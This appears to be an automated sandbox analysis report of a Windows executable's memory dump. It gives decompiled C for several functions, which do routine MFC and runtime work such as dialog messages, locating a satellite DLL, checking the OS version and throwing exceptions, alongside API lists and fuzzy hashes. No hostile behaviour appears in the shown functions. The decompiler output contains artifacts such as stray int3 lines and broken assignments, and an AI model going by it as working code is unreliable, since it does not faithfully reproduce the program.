0x00433fa6
0x00433fbe
0x00433fbf
0x00433fc1
0x00433fc7
0x00433fdb
0x00433fe1
0x00433feb
0x00433feb
0x00433fed
0x00433ff0
0x00433ff1
0x00433ffd
0x00433f7f
0x00433f82
0x00433f88
0x00433f91
0x00433f96
0x00000000
0x00433f98
0x00433f9a
0x00433f9c
0x00433f9c
0x00433f96

APIs

__calloc_crt.LIBCMT ref: 00433F6F
__calloc_crt.LIBCMT ref: 00433F88

Strings

7E, xrefs: 00433F9F

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_crt
String ID: 7E
API String ID: 3494438863-1921024439
Opcode ID: 67a570615fac86b96e42a423bc009969f8f9ea152db8d64f80f8483bd9cb412b
Instruction ID: a0b7be4d21194713e048398d7ce777f4146060a70c2698c0156d40b08fff5919
Opcode Fuzzy Hash: 67a570615fac86b96e42a423bc009969f8f9ea152db8d64f80f8483bd9cb412b
Instruction Fuzzy Hash: 9411E371B093101BE7248E2DBC4076662A1EB8D72BFA4553BF901CB3D2D738DE81464C

Uniqueness

Uniqueness Score: -1.00%

Function 0041357C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041357C(signed short __ecx, void* __eflags, signed short* _a4) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed short _v20;
				signed short* _v48;
				void _v52;
				void* _v56;
				void* __ebx;
				void* __ebp;
				signed short _t35;
				signed short _t36;
				void* _t49;
				intOrPtr _t50;
				signed int _t52;
				signed short _t58;
				signed short* _t63;
				signed short* _t66;
				signed short* _t68;
				long _t69;
				void* _t71;
				void* _t73;
				void* _t74;

				_t51 = __ecx;
				E00420A14(1);
				E00429326(0, 0);
				asm("int3");
				_t71 = _t73;
				_t74 = _t73 - 0x34;
				_t63 = _a4;
				_t58 = _t51;
				_v12 = _t58;
				_v8 = 1;
				if(_t63 == 0) {
					L19:
					E0041176E(_t49, _t51, _t56,  *(_t58 + 0x20), 0x364, 0, 0, 0, 0);
				} else {
					_push(_t49);
					_t50 = __imp__SendDlgItemMessageA; // 0x774147e0
					while(1) {
						_t35 =  *_t63 & 0x0000ffff;
						if(_t35 == 0) {
							break;
						}
						_t66 =  &(_t63[1]);
						_t51 = _t35 & 0x0000ffff;
						_t36 =  *_t66 & 0x0000ffff;
						_t68 =  &(_t66[1]);
						_t56 =  *_t68;
						_t69 =  &(_t68[2]);
						_v16 = _t51;
						_v20 =  *_t68;
						if(_t36 == 0x1234) {
							L10:
							_t52 = 8;
							memset( &_v52, 0, _t52 << 2);
							_t74 = _t74 + 0xc;
							_v52 = _v52 | 0xffffffff;
							_v56 = 1;
							E00401EE0(_t50, _t71, _t69);
							_v48 = _a4;
							if(SendDlgItemMessageA( *(_v12 + 0x20), _v16 & 0x0000ffff, 0x401, 0,  &_v56) == 0xffffffff) {
								_v8 = _v8 & 0x00000000;
							}
							_t51 =  &(_a4[0xfffffffffffffff8]);
							E00401E60( &(_a4[0xfffffffffffffff8]), _t56);
							_t58 = _v12;
						} else {
							if(_t36 != 0x401) {
								if(_t36 == 0x403) {
									_t36 = 0x143;
								}
								if(_t36 != 0x401) {
									if(_t36 == 0x180 || _t36 == 0x143) {
										goto L15;
									}
								} else {
									goto L10;
								}
							} else {
								_t36 = 0x180;
								L15:
								if(SendDlgItemMessageA( *(_t58 + 0x20), _t51 & 0x0000ffff, _t36 & 0x0000ffff, 0, _t69) == 0xffffffff) {
									_v8 = _v8 & 0x00000000;
								}
							}
						}
						_t63 = _t69 + _v20;
						if(_v8 != 0) {
							continue;
						}
						break;
					}
					_pop(_t49);
					if(_v8 != 0) {
						goto L19;
					}
				}
				return _v8;
			}

0x0041357c
0x0041357e
0x00413587
0x0041358c
0x0041358e
0x00413590
0x00413594
0x0041359a
0x0041359c
0x0041359f
0x004135a6
0x00413686
0x00413694
0x004135ac
0x004135ac
0x004135ad
0x004135b3
0x004135b3
0x004135b9
0x00000000
0x00000000
0x004135c0
0x004135c1
0x004135c4
0x004135c8
0x004135c9
0x004135cb
0x004135d2
0x004135d5
0x004135d8
0x004135f8
0x004135fa
0x00413600
0x00413600
0x00413602
0x0041360a
0x00413611
0x00413619
0x00413637
0x00413639
0x00413639
0x00413640
0x00413643
0x00413648
0x004135da
0x004135de
0x004135eb
0x004135ed
0x004135ed
0x004135f6
0x00413651
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004135e0
0x004135e0
0x00413659
0x0041366c
0x0041366e
0x0041366e
0x0041366c
0x004135de
0x00413672
0x00413679
0x00000000
0x00000000
0x00000000
0x00413679
0x00413683
0x00413684
0x00000000
0x00000000
0x00413684
0x0041369f

APIs

Part of subcall function 00420A14: LeaveCriticalSection.KERNEL32(?,00416E37,00000010,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00420A2B

__CxxThrowException@8.LIBCMT ref: 00413587

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00429366

SendDlgItemMessageA.USER32(?,?,00000401,00000000,00000001), ref: 00413632
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00413667

Strings

GAw, xrefs: 004135AD

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend$CriticalExceptionException@8LeaveRaiseSectionThrow
String ID: GAw
API String ID: 1466613979-2039021800
Opcode ID: 24c4a0009455be0a1232256184d56ead3422bda4f3ec779fe6ae7eb652849d97
Instruction ID: 049c3642c56f9315d2df8886d0c18884799de56e1e188bdf1557974ba1594a51
Opcode Fuzzy Hash: 24c4a0009455be0a1232256184d56ead3422bda4f3ec779fe6ae7eb652849d97
Instruction Fuzzy Hash: 7611B675900224BBEB249E59DC40BFAB3E8EB14715F504157FD91E72D0C3B89E81D6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040AFB5(intOrPtr __ebx, void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t33;
				signed int _t36;

				_t21 = __ebx;
				_t11 =  *0x44f5d0; // 0x765b253d
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E0040AA60( &_v280, _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E0040ACCE(__ebx,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E0042569C(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x0040afb5
0x0040afbe
0x0040afc5
0x0040afcb
0x0040afdb
0x0040afe3
0x0040b03a
0x0040b03a
0x0040b03a
0x0040afe9
0x0040aff1
0x0040aff7
0x0040afff
0x0040b000
0x0040b004
0x0040b00f
0x0040b015
0x0040b016
0x0040b017
0x00000000
0x0040b019
0x0040b024
0x0040b033
0x0040b033
0x0040b017
0x0040b048

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040AFDB
PathFindExtensionA.SHLWAPI(?), ref: 0040AFF1

Part of subcall function 0040AA60: _strcpy_s.LIBCMT ref: 0040AA6C

Part of subcall function 0040ACCE: __EH_prolog3.LIBCMT ref: 0040ACED
Part of subcall function 0040ACCE: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 0040AD0E
Part of subcall function 0040ACCE: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0040AD1F
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(?), ref: 0040AD55
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(?), ref: 0040AD5D
Part of subcall function 0040ACCE: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0040AD71
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(?), ref: 0040AD95
Part of subcall function 0040ACCE: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040AD9B
Part of subcall function 0040ACCE: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040ADD4

Strings

%s.dll, xrefs: 0040AFF7

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 9b7c228b595554738f03df3acb22f535725a81e79eb3f780f37b4b20208d7fc3
Instruction ID: c1f34b6123e9bc8b8de62e29be8e87cb1c3f3761e615654107909229194c5589
Opcode Fuzzy Hash: 9b7c228b595554738f03df3acb22f535725a81e79eb3f780f37b4b20208d7fc3
Instruction Fuzzy Hash: 9C017971E00218ABDB18EB64ED559EFB3BDDF04B04F4501BAA907E3180EB749E448A99

Uniqueness

Uniqueness Score: -1.00%

Function 00439550, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00439550(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t30;
				intOrPtr _t35;
				intOrPtr* _t38;
				intOrPtr _t39;
				signed int _t40;
				void* _t42;

				_t36 = __edi;
				_t35 = __edx;
				_t30 = __ebx;
				_t40 = _t42 - 0x78;
				_t19 =  *0x44f5d0; // 0x765b253d
				 *(_t40 + 0x74) = _t19 ^ _t40;
				_t38 = __ecx;
				E004394FA(__ecx);
				 *((intOrPtr*)(_t38 + 8)) = 0x400000;
				 *((intOrPtr*)(_t38 + 4)) = 0x400000;
				 *_t38 = 0x3c;
				 *((char*)(_t38 + 0xc)) = 0;
				E004277B0(__edi, _t40 - 0x20, 0, 0x94);
				 *(_t40 - 0x20) = 0x94;
				GetVersionExA(_t40 - 0x20);
				if( *((intOrPtr*)(_t40 - 0x10)) != 2) {
					__eflags =  *((intOrPtr*)(_t40 - 0x10)) - 1;
					if(__eflags == 0) {
						__eflags =  *((intOrPtr*)(_t40 - 0x1c)) - 4;
						if(__eflags > 0) {
							goto L7;
						} else {
							if(__eflags == 0) {
								__eflags =  *((intOrPtr*)(_t40 - 0x18));
								if(__eflags > 0) {
									goto L7;
								}
							}
						}
					}
				} else {
					_t48 =  *((intOrPtr*)(_t40 - 0x1c)) - 5;
					if( *((intOrPtr*)(_t40 - 0x1c)) >= 5) {
						L7:
						 *((char*)(_t38 + 0xc)) = 1;
					}
				}
				 *((intOrPtr*)(_t38 + 0x10)) = 0x800;
				 *((intOrPtr*)(_t38 + 0x14)) = 0x4425e0;
				if(E004393EB(_t38 + 0x18, _t48) < 0) {
					 *0x4537cc = 1;
				}
				_pop(_t39);
				return E0042569C(_t38, _t30,  *(_t40 + 0x74) ^ _t40, _t35, _t36, _t39);
			}

0x00439550
0x00439550
0x00439550
0x00439551
0x0043955b
0x00439562
0x00439566
0x00439568
0x00439577
0x0043957a
0x00439583
0x00439589
0x0043958d
0x00439599
0x004395a0
0x004395aa
0x004395b4
0x004395b8
0x004395ba
0x004395be
0x00000000
0x004395c0
0x004395c0
0x004395c2
0x004395c6
0x00000000
0x00000000
0x004395c6
0x004395c0
0x004395be
0x004395ac
0x004395ac
0x004395b0
0x004395c8
0x004395c8
0x004395c8
0x004395b0
0x004395cf
0x004395d6
0x004395e4
0x004395e6
0x004395e6
0x004395f4
0x004395fe

APIs

_memset.LIBCMT ref: 0043958D
GetVersionExA.KERNEL32(?), ref: 004395A0

Strings

%D, xrefs: 004395D6

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Version_memset
String ID: %D
API String ID: 963298953-2104738290
Opcode ID: 9cdfd29e3b7ccd4d4a6ad3a815523b1a7655234fab9f268185b4d07bcdb5a187
Instruction ID: 6327312a4b0d9c603f1ca1a29768281a6f47a2dcfe8301600776b71324c8d170
Opcode Fuzzy Hash: 9cdfd29e3b7ccd4d4a6ad3a815523b1a7655234fab9f268185b4d07bcdb5a187
Instruction Fuzzy Hash: 2111B6B1900709DEEF31DF65D80479EB7F0AB09708F00892FD45192281E7BC9948CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404AC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00404AC3(signed int __eax, signed int __ecx, char _a4) {
				char _v0;
				intOrPtr _v8;
				intOrPtr* __esi;

				if((__eax | 0xffffffff) / __ecx >= 0x1c) {
					return E0040A3C7(__ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx, __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx);
				} else {
					__eax = __esp;
					__ecx =  &_a4;
					_v0 = 0;
					__eax = E00425E86( &_a4, __edx, __esp);
					__ecx =  &_v0;
					_v0 = 0x44257c;
					__eax = E00429326( &_v0, 0x44ae50);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__eax = _v8;
					__esi = __ecx;
					__eax = E00404B20(_v8);
					 *__esi = 0x442594;
					__eax = __esi;
					__esi = __esi;
					return __esi;
				}
			}

0x00404acd
0x00404ac2
0x00404acf
0x00404acf
0x00404ad3
0x00404ad7
0x00404adf
0x00404ae9
0x00404aee
0x00404af6
0x00404afb
0x00404afc
0x00404afd
0x00404afe
0x00404aff
0x00404b00
0x00404b06
0x00404b08
0x00404b0d
0x00404b13
0x00404b15
0x00404b16
0x00404b16

APIs

std::exception::exception.LIBCMT ref: 00404ADF

Part of subcall function 00425E86: _strlen.LIBCMT ref: 00425E9C
Part of subcall function 00425E86: _malloc.LIBCMT ref: 00425EA5
Part of subcall function 00425E86: _strcpy_s.LIBCMT ref: 00425EB7

__CxxThrowException@8.LIBCMT ref: 00404AF6

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00429366

Part of subcall function 00404B20: std::exception::exception.LIBCMT ref: 00404B4E

Strings

|%D, xrefs: 00404AEE

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$ExceptionException@8RaiseThrow_malloc_strcpy_s_strlen
String ID: |%D
API String ID: 2865764815-1005067592
Opcode ID: c8d402a08d4f9bd314109da3c77bef6397ab4d3150a18583c0e5fbb983926d01
Instruction ID: 2937444950d94432ab7b04c2b8a0213aa74f47cbb9dc67bd430071b9e319529b
Opcode Fuzzy Hash: c8d402a08d4f9bd314109da3c77bef6397ab4d3150a18583c0e5fbb983926d01
Instruction Fuzzy Hash: D8F0B4F1A442106BE308EF65ED01B4B76959FD8324F94CE2FB19882184EB7CD9248B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00404E39, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00404E39(signed int __eax, void* __ebx, signed int __ecx, void* __esi, void* __ebp, signed int _a4) {
				signed int _v0;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int __edi;
				signed int _t41;

				_t41 = __eax | 0xffffffff;
				_t54 = _t41 / __ecx - 2;
				if(_t41 / __ecx >= 2) {
					return E0040A3C7(_t54, __ecx + __ecx);
				} else {
					__eax = __esp;
					__ecx =  &_a4;
					_v0 = 0;
					__eax = E00425E86( &_a4, __edx, __esp);
					__ecx =  &_v0;
					_v0 = 0x44257c;
					__eax = E00429326( &_v0, 0x44ae50);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					__ecx = _a4;
					__esp = __esp - 0xc;
					__eflags = __ecx;
					if(__ecx > 0) {
						__eax = __eax | 0xffffffff;
						__edx = 0;
						_t12 = __eax % __ecx;
						__eax = __eax / __ecx;
						__edx = _t12;
						__eflags = __eax - 1;
						if(__eflags >= 0) {
							goto L5;
						} else {
							__eax =  &_a4;
							__ecx =  &_v12;
							_a4 = 0;
							__eax = E00425E86( &_v12, __edx,  &_a4);
							__ecx =  &_v16;
							_v16 = 0x44257c;
							__eax = E00429326( &_v16, 0x44ae50);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__esp = __esp - 8;
							__eflags =  *(__esi + 0x14) - __ebx;
							_push(__edi);
							__edi = __eax;
							if(__eflags < 0) {
								__eax = E00439296(__ebx, __edi, __esi, __eflags);
							}
							__eax =  *(__esi + 0x14);
							__eax =  *(__esi + 0x14) - __ebx;
							__eflags = __eax - __edi;
							if(__eax < __edi) {
								__edi = __eax;
							}
							__eflags = __edi;
							if(__edi > 0) {
								__ecx =  *(__esi + 0x18);
								__eflags = __ecx - 8;
								_push(__ebp);
								__ebp = __esi + 4;
								if(__ecx < 8) {
									_v20 = __ebp;
								} else {
									__edx = _v0;
									_v20 = _v0;
								}
								__eflags = __ecx - 8;
								if(__ecx < 8) {
									_v16 = __ebp;
								} else {
									__edx = _v0;
									_v16 = _v0;
								}
								__edx = _v20;
								__eax = __eax + __eax;
								__ebx + __edi = _v20 + (__ebx + __edi) * 2;
								__ecx = __ecx + __ecx;
								__ecx = _v16;
								__edx = _v16 + __ebx * 2;
								__eax =  *(__esi + 0x14);
								__eax =  *(__esi + 0x14) - __edi;
								__eflags =  *(__esi + 0x18) - 8;
								 *(__esi + 0x14) = __eax;
								if( *(__esi + 0x18) >= 8) {
									__ebp = _v0;
								}
								 *((short*)(__ebp + __eax * 2)) = 0;
								_pop(__ebp);
							}
							__eax = __esi;
							_pop(__edi);
							__esp = __esp + 8;
							return __esi;
						}
					} else {
						__ecx = 0;
						__eflags = 0;
						L5:
						__eax = E0040A3C7(__eflags, __ecx);
						__esp = __esp + 0xc;
						return __eax;
					}
				}
			}

0x00404e39
0x00404e40
0x00404e43
0x00404e38
0x00404e45
0x00404e45
0x00404e49
0x00404e4d
0x00404e55
0x00404e5f
0x00404e64
0x00404e6c
0x00404e71
0x00404e72
0x00404e73
0x00404e74
0x00404e75
0x00404e76
0x00404e77
0x00404e78
0x00404e79
0x00404e7a
0x00404e7b
0x00404e7c
0x00404e7d
0x00404e7e
0x00404e7f
0x00404e80
0x00404e84
0x00404e87
0x00404e89
0x00404e9c
0x00404e9f
0x00404ea1
0x00404ea1
0x00404ea1
0x00404ea3
0x00404ea6
0x00000000
0x00404ea8
0x00404ea8
0x00404ead
0x00404eb1
0x00404eb9
0x00404ec3
0x00404ec8
0x00404ed0
0x00404ed5
0x00404ed6
0x00404ed7
0x00404ed8
0x00404ed9
0x00404eda
0x00404edb
0x00404edc
0x00404edd
0x00404ede
0x00404edf
0x00404ee0
0x00404ee3
0x00404ee6
0x00404ee7
0x00404ee9
0x00404eeb
0x00404eeb
0x00404ef0
0x00404ef3
0x00404ef5
0x00404ef7
0x00404ef9
0x00404ef9
0x00404efb
0x00404efd
0x00404eff
0x00404f02
0x00404f05
0x00404f06
0x00404f09
0x00404f14
0x00404f0b
0x00404f0b
0x00404f0e
0x00404f0e
0x00404f18
0x00404f1b
0x00404f26
0x00404f1d
0x00404f1d
0x00404f20
0x00404f20
0x00404f2a
0x00404f30
0x00404f36
0x00404f3c
0x00404f3f
0x00404f43
0x00404f4c
0x00404f4f
0x00404f54
0x00404f58
0x00404f5b
0x00404f5d
0x00404f5d
0x00404f60
0x00404f67
0x00404f67
0x00404f68
0x00404f6a
0x00404f6b
0x00404f6e
0x00404f6e
0x00404e8b
0x00404e8b
0x00404e8b
0x00404e8d
0x00404e8e
0x00404e96
0x00404e99
0x00404e99
0x00404e89

APIs

std::exception::exception.LIBCMT ref: 00404E55

Part of subcall function 00425E86: _strlen.LIBCMT ref: 00425E9C
Part of subcall function 00425E86: _malloc.LIBCMT ref: 00425EA5
Part of subcall function 00425E86: _strcpy_s.LIBCMT ref: 00425EB7

__CxxThrowException@8.LIBCMT ref: 00404E6C

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00429366

Strings

|%D, xrefs: 00404E64

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionException@8RaiseThrow_malloc_strcpy_s_strlenstd::exception::exception
String ID: |%D
API String ID: 3160936874-1005067592
Opcode ID: ffeabc6474023770f937e3146c70418d5d3e7fb55c71d9da686a4fea33b75d77
Instruction ID: f07a7fc72b55d604720044e86a381605f99391d8e697b7815cbd527ead3d1c55
Opcode Fuzzy Hash: ffeabc6474023770f937e3146c70418d5d3e7fb55c71d9da686a4fea33b75d77
Instruction Fuzzy Hash: CDE026F09143006BD308EF61D841A0B33A5AFD4318F90CE1FF4A9810D1EBB8D2188A1F

Uniqueness

Uniqueness Score: -1.00%

Function 00404E80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404E80(signed int __ebx, void* __esi, void* __ebp, signed int _a4) {
				char _v12;
				void* _v16;
				intOrPtr* _v20;
				void* __edi;
				signed int _t31;
				signed int _t32;
				void* _t37;
				void* _t39;
				signed int _t47;
				signed int _t49;
				signed int _t50;
				intOrPtr _t53;
				signed int _t58;
				void* _t64;
				void* _t66;
				void* _t67;
				intOrPtr* _t68;
				void* _t70;
				void* _t71;
				void* _t74;

				_t67 = __ebp;
				_t66 = __esi;
				_t49 = __ebx;
				_t50 = _a4;
				_t71 = _t70 - 0xc;
				if(_t50 > 0) {
					_t32 = _t31 | 0xffffffff;
					_t58 = _t32 % _t50;
					__eflags = _t32 / _t50 - 1;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E00425E86( &_v12, _t58,  &_a4);
						_v16 = 0x44257c;
						_t37 = E00429326( &_v16, 0x44ae50);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t74 = _t71 - 8;
						__eflags =  *((intOrPtr*)(__esi + 0x14)) - __ebx;
						_t64 = _t37;
						if(__eflags < 0) {
							E00439296(__ebx, _t64, __esi, __eflags);
						}
						_t39 =  *(_t66 + 0x14) - _t49;
						__eflags = _t39 - _t64;
						if(_t39 < _t64) {
							_t64 = _t39;
						}
						__eflags = _t64;
						if(_t64 > 0) {
							_t53 =  *((intOrPtr*)(_t66 + 0x18));
							__eflags = _t53 - 8;
							_push(_t67);
							_t68 = _t66 + 4;
							if(_t53 < 8) {
								_v20 = _t68;
							} else {
								_v20 =  *_t68;
							}
							__eflags = _t53 - 8;
							if(_t53 < 8) {
								_v16 = _t68;
							} else {
								_v16 =  *_t68;
							}
							E0042581A(_v16 + _t49 * 2, _t53 - _t49 + _t53 - _t49, _v20 + (_t49 + _t64) * 2, _t39 - _t64 + _t39 - _t64);
							_t47 =  *(_t66 + 0x14) - _t64;
							_t74 = _t74 + 0x10;
							__eflags =  *((intOrPtr*)(_t66 + 0x18)) - 8;
							 *(_t66 + 0x14) = _t47;
							if( *((intOrPtr*)(_t66 + 0x18)) >= 8) {
								_t68 =  *_t68;
							}
							 *((short*)(_t68 + _t47 * 2)) = 0;
						}
						return _t66;
					}
				} else {
					_t50 = 0;
					L2:
					return E0040A3C7(0, _t50);
				}
			}

0x00404e80
0x00404e80
0x00404e80
0x00404e80
0x00404e84
0x00404e89
0x00404e9c
0x00404ea1
0x00404ea3
0x00404ea6
0x00000000
0x00404ea8
0x00404eb1
0x00404eb9
0x00404ec8
0x00404ed0
0x00404ed5
0x00404ed6
0x00404ed7
0x00404ed8
0x00404ed9
0x00404eda
0x00404edb
0x00404edc
0x00404edd
0x00404ede
0x00404edf
0x00404ee0
0x00404ee3
0x00404ee7
0x00404ee9
0x00404eeb
0x00404eeb
0x00404ef3
0x00404ef5
0x00404ef7
0x00404ef9
0x00404ef9
0x00404efb
0x00404efd
0x00404eff
0x00404f02
0x00404f05
0x00404f06
0x00404f09
0x00404f14
0x00404f0b
0x00404f0e
0x00404f0e
0x00404f18
0x00404f1b
0x00404f26
0x00404f1d
0x00404f20
0x00404f20
0x00404f47
0x00404f4f
0x00404f51
0x00404f54
0x00404f58
0x00404f5b
0x00404f5d
0x00404f5d
0x00404f60
0x00404f67
0x00404f6e
0x00404f6e
0x00404e8b
0x00404e8b
0x00404e8d
0x00404e99
0x00404e99

APIs

std::exception::exception.LIBCMT ref: 00404EB9
__CxxThrowException@8.LIBCMT ref: 00404ED0

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

Strings

|%D, xrefs: 00404EC8

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
